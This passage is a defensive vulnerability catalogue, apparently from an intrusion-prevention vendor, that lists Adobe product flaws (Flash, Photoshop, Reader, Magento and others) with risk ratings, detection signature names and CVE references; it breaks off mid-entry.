Description:

There exists a use after free vulnerability in Adobe Flash Player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2015-8430

References:

CVE-2015-8430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8430

Adobe-Flash-Player-Use-After-Free-CVE-2016-0988

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

Moderate

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Use-after-free

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-0988

References:

CVE-2016-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0988

Adobe-Flash-Player-Use-After-Free-CVE-2016-7892

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-992-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2016-7892

References:

CVE-2016-7892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7892

MS16-154
http://technet.microsoft.com/security/bulletin/MS16-154

Adobe-Flash-Player-Use-After-Free-CVE-2017-3058

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3058

References:

CVE-2017-3058
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3058

Adobe-Flash-Player-Use-After-Free-CVE-2017-3059

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3059

References:

CVE-2017-3059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3059

Adobe-Flash-Player-Use-After-Free-CVE-2017-3062

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3062

References:

CVE-2017-3062
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3062

Adobe-Flash-Player-Use-After-Free-CVE-2017-3063

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-876-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a use after free vulnerability in Adobe Flash player.

Situation:

File-Flash_Adobe-Flash-Player-Use-After-Free-CVE-2017-3063

References:

CVE-2017-3063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3063

Adobe-Flash-Player-Vulnerability-CVE-2012-1535

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-469-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a vulnerability in Adobe Flash Player.

Situation:

File-OLE_Adobe-Flash-Player-Vulnerability-CVE-2012-1535
File-Flash_Adobe-Flash-Player-Vulnerability-CVE-2012-1535

References:

CVE-2012-1535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1535

BID-55009
http://www.securityfocus.com/bid/55009

OSVDB-84607
http://www.osvdb.org/84607

Adobe-Flash-Selection.setfocus-Use-After-Free

About this vulnerability:

A vulnerability in Adobe Systems Adobe Flash Player Desktop Runtime

Risk:

Moderate

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

A use-after-free vulnerability in Adobe Flash allows an attacker to run arbitrary code on the target system.

Situation:

File-Flash_Adobe-Flash-Selection.setfocus-Use-After-Free

References:

CVE-2016-4227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4227

Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4144

References:

CVE-2016-4144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4144

Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Type-Confusion-Vulnerability-CVE-2016-4149

References:

CVE-2016-4149
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4149

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4121

References:

CVE-2016-4121
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4121

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4142

References:

CVE-2016-4142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4142

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4143

References:

CVE-2016-4143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4143

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4146

References:

CVE-2016-4146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4146

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4147

References:

CVE-2016-4147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4147

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-772-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-4148

References:

CVE-2016-4148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4148

Adobe-Flash-Use-After-Free-Vulnerability-CVE-2016-7855

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-817-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Use-After-Free-CVE-2016-7855

References:

CVE-2016-7855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7855

Adobe-Flash-Vulnerability-CVE-2011-0609

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

High

First detected in:

sgpkg-ips-383-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a vulnerability in Adobe Flash.

Situation:

E-Mail_BS-Adobe-Flash-Exploit-CVE-2011-0609
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609
HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0609-2
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609
File-OLE_Adobe-Flash-Exploit-CVE-2011-0609-2
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609-2
File-Flash_Adobe-Flash-Exploit-CVE-2011-0609
File-PDF_Adobe-Flash-Exploit-CVE-2011-0609
File-Binary_Adobe-Flash-Exploit-CVE-2011-0609

References:

CVE-2011-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0609

BID-46860
http://www.securityfocus.com/bid/46860

OSVDB-71254
http://www.osvdb.org/71254

Adobe-Flash-Vulnerability-CVE-2011-0611

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

High

First detected in:

sgpkg-ips-400-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There is a vulnerability in Adobe Flash.

Situation:

HTTP_SS-Adobe-Flash-Exploit-CVE-2011-0611
File-OLE_Adobe-Flash-Exploit-CVE-2011-0611
File-Flash_Adobe-Flash-Exploit-CVE-2011-0611
File-Binary_Adobe-Flash-Exploit-CVE-2011-0611

References:

CVE-2011-0611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611

BID-47314
http://www.securityfocus.com/bid/47314

Adobe-Flash-Vulnerability-CVE-2016-4171

About this vulnerability:

A vulnerability in Adobe Flash

Risk:

Moderate

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Flash Player

Type:

Malfunction

Description:

There exists a vulnerability in Adobe Flash.

Situation:

File-Flash_Adobe-Flash-Vulnerability-CVE-2016-4171

References:

CVE-2016-4171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4171

Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Illustrator CS3

Risk:

High

First detected in:

sgpkg-ips-381-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Illustrator

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Adobe Illustrator software. The vulnerability is due to a boundary error while parsing Encapsulated Postscript (.eps) files containing an overly long DSC comment value. Remote attackers can exploit this vulnerability by enticing target users to open a crafted EPS file with a vulnerable version of the affected product. Successful exploitation would result in arbitrary code execution with the privileges of the logged in user. If an attack is unsuccessful, the behaviour of the vulnerable application will appear unchanged.

Situation:

HTTP_SS-Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow
File-TextId_Adobe-Illustrator-Eps-File-Dsc-Comment-Buffer-Overflow

References:

CVE-2009-4195
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4195

BID-37192
http://www.securityfocus.com/bid/37192

OSVDB-60632
http://www.osvdb.org/60632

Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication

About this vulnerability:

A vulnerability in Adobe Systems InDesign

Risk:

Moderate

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

Adobe InDesign

Type:

Malfunction

Description:

There is a command execution vulnerability in Adobe InDesign Server. The vulnerability is due to a failure to restrict access to the SOAP interface. An attacker can exploit this vulnerability by sending RunScript SOAP requests to the vulnerable server. Successful exploitation could result in execution of arbitrary script code in the context of the service.

Situation:

File-TextId_Adobe-Indesign-Server-Soap-Request-Lack-Of-Authentication

References:

OSVDB-87548
http://www.osvdb.org/87548

Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Adobe Systems InDesign

Risk:

Moderate

First detected in:

sgpkg-ips-1165-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe InDesign

Type:

Input Validation

Description:

There has been reported a vulnerability in Adobe InDesign. This vulnerability could be exploited by opening a maliciously crafted document file. Successful exploitation could lead in arbitrary code execution.

Situation:

File-TextId_Adobe-Indesign-Unsafe-Hyperlink-Processing-Remote-Code-Execution

References:

CVE-2019-7107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7107

Adobe-Magento-Downloadcss-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Adobe Systems Magento Commerce

Risk:

Moderate

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

Adobe Magento

Type:

Input Validation

Description:

Improper validation of the file resource identifier in requests handled by DownloadCss.php causes a cross-site scripting vulnerability in Adobe Magento. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Adobe-Magento-Downloadcss-Cross-Site-Scripting

References:

CVE-2021-21029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21029

Adobe-Magento-Remote-Code-Execution-CVE-2022-24086

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Magento detected

Risk:

High

First detected in:

sgpkg-ips-1441-5242

Last changed:

sgpkg-ips-1441-5242

Platform:

Generic

Software:

Adobe Magento

Type:

Input Validation

Description:

A pre-auth remote code execution vulnerability has been reported in Adobe Magento.

Situation:

HTTP_CRL-Adobe-Magento-Remote-Code-Execution-CVE-2022-24086

References:

CVE-2022-24086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24086

Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Adobe Photoshop

Risk:

High

First detected in:

sgpkg-ips-278-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop; Adobe Photoshop Album Starter; Adobe After Effects

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the way multiple Adobe products parse BMP files. The vulnerability is due to boundary errors while handling BMP files Image Header. An attacker may exploit this vulnerability by enticing a target user to open a malicious BMP file. Successful exploitation might lead to injection and execution of arbitrary code in the security context of the currently logged in user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, the affected application will terminate resulting in the loss of any unsaved data from the current session.

Situation:

HTTP_SS-Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow
File-Binary_Adobe-Multiple-Products-BMP-Image-Header-Handling-Buffer-Overflow

References:

CVE-2008-1765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1765

BID-28874
http://www.securityfocus.com/bid/28874

Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Photoshop CS5.1

Risk:

Moderate

First detected in:

sgpkg-ips-453-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in Adobe Photoshop. The vulnerability is due to insufficient validation of Collada asset elements. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to download a malicious file. This can lead to arbitrary code execution in the context of the affected application.

Situation:

File-TextId_Adobe-Photoshop-Asset-Elements-Stack-Buffer-Overflow

References:

CVE-2012-2052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2052

BID-53464
http://www.securityfocus.com/bid/53464

OSVDB-81832
http://www.osvdb.org/81832

Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Adobe Photoshop

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Adobe Photoshop CS4.

Situation:

HTTP_SS-Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow
File-MPEG_Adobe-Photoshop-Cs4-Abr-File-Processing-Buffer-Overflow

References:

CVE-2010-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1296

BID-40389
http://www.securityfocus.com/bid/40389

Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Adobe Photoshop

Risk:

Moderate

First detected in:

sgpkg-ips-431-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A heap corruption vulnerability exists in Adobe Photoshop CS5. The vulnerability is due to insufficient boundary checking while processing crafted GIF files. Remote attackers can exploit this vulnerability by enticing the target user to open a malicious GIF file. A successful attack would result in the execution of arbitrary code in the security context of the target user. If the attack fails the affected application may terminate abnormally.

Situation:

File-GIF_Adobe-Photoshop-Cs5-Gif-File-Heap-Corruption

References:

CVE-2011-2131
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2131

Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Photoshop CS6

Risk:

High

First detected in:

sgpkg-ips-492-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been reported in Adobe Photoshop's Standard MultiPlugin.8BF. The vulnerability is due to an error while handling tRNS chunks in a PNG file. Remote, unauthenticated attackers can exploit this vulnerability by enticing a user to download and process a malicious PNG file. This can result in code execution in the context of the affected application.

Situation:

File-PNG_Adobe-Photoshop-PNG-Image-Processing-Buffer-Overflow

References:

CVE-2012-4170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4170

BID-55333
http://www.securityfocus.com/bid/55333

OSVDB-85006
http://www.osvdb.org/85006

Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Adobe Photoshop CS5.1

Risk:

Moderate

First detected in:

sgpkg-ips-503-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability has been discovered in Adobe Photoshop's handling of specially crafted TIFF files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted TIFF file with the affected application. Successful exploitation could result in arbitrary code execution in the context of the target user.

Situation:

File-Binary_Adobe-Photoshop-TIFF-Parsing-Heap-Buffer-Overflow

References:

CVE-2012-2027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2027

BID-52634
http://www.securityfocus.com/bid/52634

Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Adobe Photoshop

Risk:

High

First detected in:

sgpkg-ips-108-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Photoshop; Adobe Photoshop Elements

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in the Adobe products. The vulnerability is due to improper boundary validation when processing PNG images. The flaw can be leveraged remotely to execute arbitrary code under the context of the currently logged in user.

Situation:

HTTP_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow
File-PNG_Adobe-Products-PNG-File-Handling-Stack-Buffer-Overflow

References:

CVE-2007-2365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2365

BID-23698
http://www.securityfocus.com/bid/23698

OSVDB-38063
http://www.osvdb.org/38063

OSVDB-35465
http://www.osvdb.org/35465

Adobe-Reader-ActiveX-Vulnerable-Function-Call

About this vulnerability:

Vulnerable ActiveX function call against Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Insecure Configuration

Description:

A vulnerability exists in Adobe Reader 7.0.8 when calling certain ActiveX functions.

References:

CVE-2006-6236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6236

BID-21813
http://www.securityfocus.com/bid/21813

OSVDB-31058
http://www.osvdb.org/31058

Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-361-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Adobe Acrobat and Reader products. The vulnerability is due to a boundary checks error while parsing crafted PDF documents. Remote attackers can exploit this vulnerability by enticing target users to open a malicious PDF document in a vulnerable version of the affected applications. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, which would run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware
File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware-2

References:

CVE-2010-0188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188

BID-38195
http://www.securityfocus.com/bid/38195

Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Adobe Reader and Acrobat.

Situation:

HTTP_SS-Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
File-PDF_Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow

References:

CVE-2008-2992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2992

BID-30035
http://www.securityfocus.com/bid/30035

OSVDB-49520
http://www.osvdb.org/49520

Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-525-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Adobe Reader and Adobe Acrobat. The vulnerability is due to a failure to validate user input when processing RLE encoded BMP images in XFA. The vulnerability can be exploited by a remote attacker by enticing a user to load a malicious file with the vulnerable product. Successful exploitation would lead to execution of arbitrary attacker code in the security context of the target user.

Situation:

HTTP_SHS-Citrix-Access-Gateway-Plug-In-For-Windows-ActiveX-Control-BOF
File-PDF_Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow

References:

CVE-2013-2729
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2729

BID-59918
http://www.securityfocus.com/bid/59918

OSVDB-93358
http://www.osvdb.org/93358

Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-487-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader; Adobe Acrobat

Type:

Malfunction

Description:

A code execution vulnerability exists in Adobe Reader and Acrobat which can allow an attacker to take control of a target system. The vulnerability is due to memory corruption while handling RMA objects in Javascript. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted document. A successful attack could result in the execution of arbitrary code in the security context of the target user. In an attack case where code injection is not successful, the affected Adobe application parsing the malicious PDF document can terminate abnormally.

Situation:

File-PDF_Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption

References:

CVE-2012-4157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4157

OSVDB-84629
http://www.osvdb.org/84629

Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass

About this vulnerability:

A vulnerability in Adobe Systems Acrobat

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat; Adobe Reader

Type:

Malfunction

Description:

A sandbox bypass vulnerability exists in Adobe Reader and Acrobat. This vulnerability can allow an attacker to access privileged Javascript functions, bypassing sandbox restrictions. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted PDF document. A successful attack could result in the execution of arbitrary Javascript code in the security context of the target user.

Situation:

File-PDF_Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass

References:

CVE-2014-0521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0521

BID-67363
http://www.securityfocus.com/bid/67363

OSVDB-106905
http://www.osvdb.org/106905

Adobe-Reader-BMP-Vulnerability-2011-2438a

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities
File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities

References:

CVE-2011-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2438

Adobe-Reader-BMP-Vulnerability-2011-2438c

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-BMP-Vulnerability-2011-2438c
File-PDF_Adobe-Reader-BMP-Vulnerability-2011-2438c
File-Binary_Adobe-Reader-BMP-Vulnerability-2011-2438c

References:

CVE-2011-2438
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2438

Adobe-Reader-BMP-Vulnerability-2011-4372

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-434-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

HTTP_SS-Adobe-Reader-BMP-Multiple-Vulnerabilities
File-PDF_Adobe-Reader-BMP-Multiple-Vulnerabilities
File-Binary_Adobe-Reader-BMP-Multiple-Vulnerabilities

References:

CVE-2011-4372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4372

BID-51349
http://www.securityfocus.com/bid/51349

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2049

About this vulnerability:

An attempt to exploit a vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-468-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2012-2050

References:

CVE-2012-2050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2050

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-551-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3353

References:

CVE-2013-3353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3353

Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354

About this vulnerability:

A vulnerability in Adobe Reader

Risk:

Moderate

First detected in:

sgpkg-ips-551-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Reader

Type:

Malfunction

Description:

A vulnerability in Adobe Reader

Situation:

File-PDF_Adobe-Reader-Buffer-Overflow-Vulnerability-CVE-2013-3354

References:

CVE-2013-3354
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3354

Adobe-Reader-Crash-CVE-2015-3056

About this vulnerability:

A vulnerability in Adobe Reader

